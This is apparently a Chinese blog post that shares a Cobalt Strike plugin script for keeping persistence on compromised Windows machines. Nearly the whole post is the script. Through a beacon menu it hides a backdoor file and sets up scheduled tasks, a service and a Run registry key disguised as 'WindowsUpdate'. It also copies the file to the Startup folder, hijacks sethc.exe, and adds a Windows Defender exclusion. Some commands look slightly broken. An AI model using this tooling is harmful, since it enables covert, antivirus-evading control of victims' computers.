自嘲:今天打开博客园一看,好家伙我竟然还有账户,原来我注册了博客园啊。
CobaltStrike插件-权限维持模块
方法都是网上常见的,正好在学怎么写插件,练手之作,大佬勿喷。
popup beacon_bottom {
menu "权限维持" {
item "设置后门文件路径" {
local('$bid');
foreach $bid ($1){
prompt_text("filePath", $filePath, {
$filePath = $1;
return $filePath;
});
}
}
item "隐藏文件" {
local('$bid');
foreach $bid ($1){
bshell($1, "attrib "$filePath" +s +h");
}
}
item "定时任务" {
local('$bid');
foreach $bid ($1){
bshell($1, "schtasks /create /tn WindowsUpdate /tr "$filePath" /sc minute /mo 1");
}
}
item "注册表"{
local('$bid');
foreach $bid ($1){
bshell($1, "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d "$filePath" /f");
}
}
item "SC服务"{
local('$bid');
foreach $bid ($1){
bshell($1, "sc create "WindowsUpdate" binpath= "cmd /c start "$filePath""&&sc config "WindowsUpdate" start= auto&&net start WindowsUpdate");
}
}
item "自启动目录"{
local('$bid');
foreach $bid ($1){
bshell($1, "copy "$filePath" "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe" /y");
bshell($1, "attrib "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe" +s +h");
}
}
item "映像劫持"{
local('$bid');
foreach $bid ($1){
bshell($1, "reg add HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Sethc.exe /f");
bshell($1, "reg add HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Sethc.exe /v Debugger /t REG_SZ /d "C:UsersAdministratorDesktopartifact.exe" /f");
bshell($1, "schtasks /create /tn WindowsUpdate /tr C:WindowsSystem32sethc.exe /sc minute /mo 1");
}
}
item "添加Defend排除项"{
local('$bid');
foreach $bid ($1){
bpoershell($1, "Set-MpPreference -ExclusionPath "$filePath" ");
}
}
}
}